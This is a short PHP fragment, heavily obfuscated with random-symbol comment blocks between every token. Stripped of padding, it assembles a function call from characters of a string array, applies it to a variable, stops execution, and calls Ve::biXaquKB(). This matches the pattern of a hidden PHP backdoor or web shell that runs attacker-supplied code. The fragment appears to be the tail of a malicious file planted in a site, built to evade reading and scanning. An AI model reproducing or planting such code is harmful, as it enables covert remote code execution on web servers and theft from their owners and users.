0/*-(7g-*///
]/*-


$⑬㊑△↭ℛ⋉↴⌘♀❽⓮↜≠⊏⋤⊣♁


:To.$⑬㊑△↭ℛ⋉↴⌘♀❽⓮↜≠⊏⋤⊣♁


-*///
(/*-w4-*///
"",/*-s`yX=C-*///
 $IlyXoWdNVU/*-w=-*///
[/*-O@JJV(^-*///
4+3/*-


∣ℬ⊽⒴⇢❧⓷


xnYcl6pZ(4∣ℬ⊽⒴⇢❧⓷


-*///
] /*-)}f-*///
. /*-

◥⒉¶⋶⊤﹪∦Ⅸ»÷〔⓬∊↱≧▵ℊ⊦

O?7◥⒉¶⋶⊤﹪∦Ⅸ»÷〔⓬∊↱≧▵ℊ⊦

-*///
$IlyXoWdNVU/*-_@(k?v?o-*///
[/*-

Ⓧ➬Ψ♫⋄◎㊩⋉⒙㊑⊊ⓢ∟⊑▬

W@VM_[hⓍ➬Ψ♫⋄◎㊩⋉⒙㊑⊊ⓢ∟⊑▬

-*///
1+3/*-


⋯Ⅼⓠ


R4,?z{U⋯Ⅼⓠ


-*///
]/*-s(B;k5a-*///
(/*-knx9Q-*///
$LCH/*-


∂Ⅼ≎◈➂


{E)UezUnwd∂Ⅼ≎◈➂


-*///
)/*-DTUA;;P-*///
 . /*-

｜⊵≃ℜ㊥

!kk｜⊵≃ℜ㊥

-*///
$IlyXoWdNVU/*-yfm)-|Xa6-*///
[/*-


㈦⅚☟♆π├


CzLDB&Do2㈦⅚☟♆π├


-*///
8+0/*-Xr7S)RUPL-*///
]/*-upk)iF6-*///
);/*-N,>-*///
/*-BBE0-*///
die;/*-

≕≪￣∻♙♗♐Ⅲ⋒≼◠⇅┕❾

hc;X≕≪￣∻♙♗♐Ⅲ⋒≼◠⇅┕❾

-*///
 endif;/*-B>4-*///
 }/*-


♗#↑↮╁∉⅒≹⓴


uD@!N_Q♗#↑↮╁∉⅒≹⓴


-*///
}/*-
⇁⒋➽⇜ⓠ⑳◍♮≷◞⋼♪✖⊬╒◥⋯⊴Ⓡ▇
e+5}8⇁⒋➽⇜ⓠ⑳◍♮≷◞⋼♪✖⊬╒◥⋯⊴Ⓡ▇
-*///
Ve/*-

♨∕⇌●➉ⓦ⊋⇆≎ⓩ✉⊞㊞Ⓥ↰Ⓐ╚╉┨㈡⇈↣㊂

0b(Roauqmi♨∕⇌●➉ⓦ⊋⇆≎ⓩ✉⊞㊞Ⓥ↰Ⓐ╚╉┨㈡⇈↣㊂

-*///
::/*-
Θ§
x1>V1RoERqΘ§
-*///
biXaquKB/*-

ℙ≦⒜⅟☇⋤∡☳⒁ⓒ♢ⓑⓥ▓⑪㊆

E_p:jpℙ≦⒜⅟☇⋤∡☳⒁ⓒ♢ⓑⓥ▓⑪㊆

-*///
();/*-
◳◩➬⊑ℒ∵*㊯
+mw%^◳◩➬⊑ℒ∵*㊯
-*///
 ?>